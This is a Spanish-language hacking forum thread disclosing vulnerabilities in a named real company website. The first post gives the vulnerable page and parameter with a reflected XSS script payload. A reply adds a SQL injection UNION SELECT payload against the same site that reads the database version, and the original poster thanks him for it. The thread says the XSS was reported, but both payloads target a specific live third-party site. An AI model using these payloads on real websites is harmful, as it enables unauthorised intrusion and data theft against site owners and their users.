[XSS] Dynasty Builders - http://www.dynastybuilders.ca/

  • 2 Respuestas
  • 3126 Vistas

0 Usuarios y 2 Visitantes están viendo este tema.

Desconectado Drok3r

  • *
  • Underc0der
  • Mensajes: 51
  • Actividad:
    0%
  • Country: tr
  • Reputación 1
  • Twitter: @drok3r
    • Ver Perfil
    • RedBird
    • Email
    Captura de pantalla


    Url del sitio


    Vector
  • Archivo y Parametro: custom-gallery.php?id=
  • Payload XSS: '"><script>alert(/Drok3r - XSS /)</script>
  • PoC:

----> You are not allowed to view links. Register or Login

    Autor
[!] Drok3r (redbirdTEAM - CiberSecurityRECON)

    Reportado: SI

Desconectado Nobody

  • *
  • Underc0der
  • Mensajes: 197
  • Actividad:
    0%
  • Country: 00
  • Reputación 4
  • Security as art.
  • Twitter: @n0bodysec
    • Ver Perfil
    • Personal Website
¡Hola Drok3r!

Excelente XSS, pero te comento que la web también es vulnerable a SQLi, por si no lo has notado.

Payload: You are not allowed to view links. Register or Login' union select 1,version(),3,4,5,6,7,8,9,10,11 -- -

¡Saludos!
You are not allowed to view links. Register or Login

Desconectado Drok3r

  • *
  • Underc0der
  • Mensajes: 51
  • Actividad:
    0%
  • Country: tr
  • Reputación 1
  • Twitter: @drok3r
    • Ver Perfil
    • RedBird
    • Email
You are not allowed to view links. Register or Login
¡Hola Drok3r!

Excelente XSS, pero te comento que la web también es vulnerable a SQLi, por si no lo has notado.

Payload: You are not allowed to view links. Register or Login' union select 1,version(),3,4,5,6,7,8,9,10,11 -- -

¡Saludos!


Aaaa que cosas.... jeje Gracias por el dato.